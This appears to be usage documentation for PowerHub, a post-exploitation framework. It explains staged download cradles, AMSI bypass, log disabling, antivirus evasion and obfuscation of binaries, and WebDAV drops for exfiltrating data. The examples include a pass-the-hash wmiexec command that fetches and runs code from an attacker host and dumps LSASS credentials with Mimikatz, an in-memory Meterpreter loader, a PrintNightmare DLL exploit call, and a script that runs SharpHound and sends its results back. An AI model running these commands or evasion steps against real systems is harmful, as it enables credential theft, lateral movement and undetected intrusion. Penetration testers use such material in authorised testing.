Usage
Nomenclature
Download cradle
Download cradle is the one-liner that loads more code, typically in several stages, onto the target when executed.
Stager
By “stager” we mean the first stage that sets up all following stages. It will perform the following tasks:
PowerHub will first define the routine for RC4 decryption and not much else.
Then, an AMSI bypass will be executed using RC4 for de-obfuscation.
Next, logging will be disabled as much as possible.
Then the second stage is loaded. It is RC4-encrypted and will define more routines that allow us to load following stages more conveniently. For example, it will define some routines that take advantage of AES libraries so encryption will perform better.
Now we are ready to load the actual payload. By default, it is the actual “PowerHub” PowerShell module. It is responsible for manually loading PowerHub modules, mounting WebDAV directories, routines for sending back files and shell output, and so on.
If configured by the user, some PowerHub modules will come pre-loaded. Also, the contents of a
profile.ps1
will be executed at the end of the last stage.
Launcher
By launcher we mean the thing that executes the download cradle. Most of the
time, it will be a PowerShell session, but it could also be a cmd.exe
session. It could also be Bash, meaning you could pass the download cradle
as a Bash argument to wmiexec
or something similar that will execute the
command on some target.
Payload
PowerHub supports the generation of binary payloads as well. Instead of a download cradle, you will get a link to an EXE file that will do the same thing. There are some system dependencies necessary to compile the code. This might easily trigger some anti virus agents, though.
Module
A module, or more specifically a PowerHub module, is the actual malicious
code. It could be a PowerShell file, a .NET binary, a PE binary or
shell code. The latter two will be executed by using PowerSploit’s
Invoke-ReflectivePEInjection
or Invoke-Shellcode
, both of which must be
loaded separately first.
Typical workflow
Most users of PowerHub run it on a system they control, preferably on the
same network as their potential targets. If you must run it on the internet,
consider using the --allow
flag to restrict access to IP addresses you’d
expect.
On targets that you can control interactively, use a browser to navigate to
the PowerHub instance. Copy the download cradle and run it in a PowerShell
session. Running Help-PowerHub
will help you get started. Most commands
can also be referred to by a short alias (example: ghm
for
Get-HubModule
).
The default settings work most of the time. If the antivirus interferes, play around with the settings. The more checkboxes you tick, the least likely it should be detected by an antivirus. However, you may lose some features, convenience or speed.
On the client you can selectively load more modules and execute them,
hopefully without triggering the antivirus. Output can be transferred back
via PushTo-Hub
or the web interface.
Features
Hub
The first tab lets you configure the download cradle. The transport method can be HTTP or HTTPS (SMB might be coming in the future), in which case the download cradle can be configured such the system proxy is used to access the PowerHub host. In case of HTTPS we can do certificate pinning, use the Windows certificate store or disable verification entirely.
The AMSI bypass can be chosen as well as the key exchange. The key, with which the RC4 and AES encryption is used, will be exchanged using the Diffie-Hellman (DH) protocol by default. Note that no host verification will be performed on top of the HTTPS connection, so this might be vulnerable to highly specific active man-in-the-middle attacks.
The DH key exchange requires an extra request, which may not always be an option, so we can also embed they key directly (in which case all code can be restored in digital forensics) or provide the key out-of-band on the command line.
The hub also lets us specify a Clipboard entry to be executed automatically or pre-load some modules, so that they will be contained in the stager. Together with the “embedded” or “out-of-band” key exchange option, this will produce an entirely self-contained file that could also be transported to the target host in arbitrary ways such as a USB drive.
Modules
This tab show the modules and lets you download some select modules conveniently.
Modules have a name as well as a number and can be referred to by both,
where the name is identical to the path of the module on the host relative
to the modules directory. Note that the number can change if modules are
added or removed, in which case you should run Update-HubModules
on the
target.
They can be loaded on the target with Get-HubModule
. You can pass a
regular expression, a number or a list of numbers. The modules will be
returned on the command line and can be passed to another Cmdlet. The code
of each module will be transferred in encrypted form and on demand (“lazy
loading”). If the code of a module changed server-side, use the -Reload
argument to force reloading the code.
PowerShell modules will be loaded by piping them to Invoke-Expression
.
.NET modules and PE modules can be executed to Run-DotNetExe
or Run-Exe
respectively. The latter requires PowerSploit’s
Invoke-ReflectivePEInjection
to be loaded first. An alias will be created
that is the same as the base name, i.e. if you execute Get-HubModule SharpHound.exe
, you will be able to execute SharpHound by calling
SharpHound.exe
afterwards. Despite the name, it’s a PowerShell function
(or alias). It will then call the module in-memory.
Clipboard
The clipboard serves as a place to share small snippets, like one-liners of code, hashes, credentials, etc. Either with yourself on different systems or with collaborators.
Clipboard entries can be marked as “executable”, so they can be specified in the download cradle. Their contents will then be executed automatically after loading the last stage. This is useful if you are experimenting with a particular command and want to keep the download cradle constant.
File Exchange
The file exchange offers a way to transfer files via HTTP back to the host. Think Droopy.
This feature can also be used on the command line with PushTo-Hub
. It can
transfer files or data from stdin via HTTP back to the PowerHub server.
Static Files
Sometimes you simply need to serve some static files (payloads, tools, etc.)
using an HTTP server that are available without any authentication. These are
situations where you might be tempted to fire up python -m http.server
. If
you are already running PowerHub, just put your files inside the static
folder instead. It will respect the tree-like structure of files and
directories and make them accessible for everyone without authentication.
WebDAV
PowerHub also provides several WebDAV shares. You can mount it on the target as
two network drives with Mount-WebDAV
or mwd
(as S:
and R:
by
default). Be careful, it allows anonymous access.
One drive is read-only – maybe you can bypass a weak anti virus with this. Some exploits require a DLL, so the idea is that you mount the WebDAV drive, put malicious DLLs in the read-only directory, and then load them like this:
PS C:\> Import-Module .\cve-2021-1675.ps1
PS C:\> Invoke-Nightmare -DLL "R:\evil-exploit-code.dll"
The other has two folders and is writable by everyone:
public
with read/write access for everyoneblackhole
for dropping sensitive data. Any file placed here via WebDAV will immediately be moved to theupload
directory on the attacker machine.
profile.ps1
You can create the file profile.ps1
in $XDG_DATA_HOME/powerhub/
which
will be automatically executed when loading PowerHub on the Windows machine.
This is my profile.ps1
:
# Make powershell tab completion behave more like bash
try {Set-PSReadlineKeyHandler -Key Tab -Function Complete} catch {}
function Invoke-SharpHound {
Param(
[parameter(Mandatory=$False, ValueFromPipeline=$True)]
[String[]]$Domain = "Default"
)
Process {
foreach ($d in $Domain) {
Get-HubModule "sharphound.exe" | Run-DotNETExe -Arguments "-c","All","--trackcomputercalls","--zipfilename",$d,"--outputdirectory",(Get-Location).Path
PushTo-Hub (Get-ChildItem "*_$d.zip")
}
}
}
# Put some commands that I pretty much always want to run in one function
function Run-Init {
Get-SysInfo | PushTo-Hub -Name sysinfo.txt
Get-HubModule "PrivescCheck.ps1"
Invoke-PrivescCheck -Extended -Report privesccheck -Format TXT,XML,CSV
PushTo-Hub "privesccheck.txt"
PushTo-Hub "privesccheck.xml"
PushTo-Hub "privesccheck.csv"
Invoke-SharpHound
Get-HubModule "Greenshot_for_PortableApps" | Run-Exe -OnDisk
}
Binary payloads
PowerHub can build binaries that execute the download cradle. The supported formats are:
Visual Basic Script (
*.vbs
)PE Executables
.NET Executables
Since they are build with the MinGW cross-compiler, they are near certainly flagged as malicious by antivirus software.
power-obfuscate
The Python script power-obfuscate
can be used to leverage PowerHub’s evasion
techniques without requiring the web server. It will allow you to build a
self-contained obfuscated PowerShell file that contains another PowerShell
script or a .NET binary. It supports some of the hub’s configuration
options, such as the option to use natural variable names.
Run power-obfuscate --help
for details.
Examples
Running Mimikatz on a remote system
One nice application is, for example, the case where you have obtained some
local administrator password hash and want to move laterally. This dumps the
LSASS creds with Mimikatz via Impacket’s wmiexec.py
:
$ wmiexec.py -hashes :deadbeef0000000000000000deadbeef \
./administrator@10.0.1.4 \
'powershell -c "$K=new-object net.webclient;IEX $K.downloadstring(\"http://10.0.100.13:8000/\"); ghm Mimikatz; Invoke-Mimikatz | pth -Name mimikatz.txt "'
Meterpreter
Let’s say you want to execute a Meterpreter in memory, then you do this after placing meterpreter.exe
in $XDG_DATA_HOME/powerhub/modules/exe
(don’t forget to reload the modules!):
PS C:\Users\pentestuser> $K=new-object net.webclient;IEX $K.downloadstring("http://10.0.100.13:8000/0");
PS C:\Users\pentestuser> ghm ReflectivePEInjection; ghm meterpreter.exe|re
It should be a staged Meterpreter to keep the binary sufficiently small. I usually use windows/x64/meterpreter/reverse_https
.
Empire
Add an Empire launcher to the clipboard, mark it as “executable”, then choose the corresponding clipboard ID as “Clip-Exec” in the PowerHub cradle builder.
power-obfuscate
Turn SharpHound.exe
into a PowerShell script and execute it upon running
the script:
$ power-obfuscate -i SharpHound.exe -o sharphound.ps1 -n -y --epilogue 'SharpHound.exe -c All'
I 2023-02-18 16:09:14 Output written to sharphound.ps1
I 2023-02-18 16:09:14 Execute the file with 'cat sharphound.ps1|iex' or 'ipmo sharphound.ps1' on the target